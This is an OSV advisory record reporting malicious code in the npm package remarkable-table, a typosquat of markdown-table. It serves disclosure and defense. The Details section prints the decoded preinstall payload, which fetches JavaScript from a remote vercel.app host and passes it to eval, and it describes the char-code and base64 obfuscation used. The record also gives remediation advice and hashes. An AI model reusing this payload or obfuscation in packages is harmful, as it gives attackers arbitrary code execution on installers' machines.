MAL-2026-10447

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/remarkable-table/MAL-2026-10447.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10447
Aliases
  • GHSA-pw78-w6gv-hfcr
Published
2026-07-13T14:03:08Z
Modified
2026-07-13T19:01:56Z
Summary
Malicious code in remarkable-table (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (464cab930bcf948abf49517f78a3ee1abb8b89c8f9c90f199bd3446c902d8e1e)

The package's preinstall script runs index.d.js, which reconstructs the identifier 'eval' from a character-code array ([101,118,97,108]) and base64-decodes an embedded payload that resolves to (async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();. On npm install, the package performs an outbound HTTPS request to everydaynodechecker-39143n.vercel.app and passes the response body to eval, executing arbitrary attacker-controlled JavaScript on the installer's machine. Both the sink (eval) and the destination are obfuscated to evade casual review. The destination is unrelated to any legitimate table/markdown functionality, and the package name is a typosquat of the widely used markdown-table.

Source: ghsa-malware (440ccabe384f89b7538fe684b1bb7fc5490d08bc49f83659808230ea46b07574)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-010244",
            "import_time": "2026-07-13T14:19:33.585370294Z",
            "modified_time": "2026-07-13T14:03:08Z",
            "sha256": "464cab930bcf948abf49517f78a3ee1abb8b89c8f9c90f199bd3446c902d8e1e",
            "source": "amazon-inspector",
            "versions": [
                "2.4.11"
            ]
        },
        {
            "id": "GHSA-pw78-w6gv-hfcr",
            "import_time": "2026-07-13T18:49:49.008291289Z",
            "modified_time": "2026-07-13T18:27:03Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "440ccabe384f89b7538fe684b1bb7fc5490d08bc49f83659808230ea46b07574",
            "source": "ghsa-malware"
        }
    ]
}
References
Credits

Affected packages

npm / remarkable-table

Package

Name
remarkable-table
View open source insights on deps.dev
Purl
pkg:npm/remarkable-table

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected

Affected versions

2.*
2.4.11

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "index.d.js",
            "sha256": "08ce09ce08b0d1d88231ba06139c60b86933107a731bc6d45da5596a92226a19",
            "tlsh": "d8f0977a63e620b4f10410df48999001b346e1f276acc8bef52ec9c629aac50a6f53e1"
        }
    ],
    "package_integrity": [
        {
            "filename": "remarkable-table-2.4.11.tgz",
            "hashes": {
                "sha1": "fa5636c9f72d4edda925e25ff609c1b708396973",
                "sha512_sri": "sha512-mTo4umIASWnGCzj1KQbSoStjLOgpm9LsKBISnIse4ef1jFjCaXS9aKL0gFM+yzovlw6vuij9bwTk3ZdXku58Og=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/remarkable-table/MAL-2026-10447.json"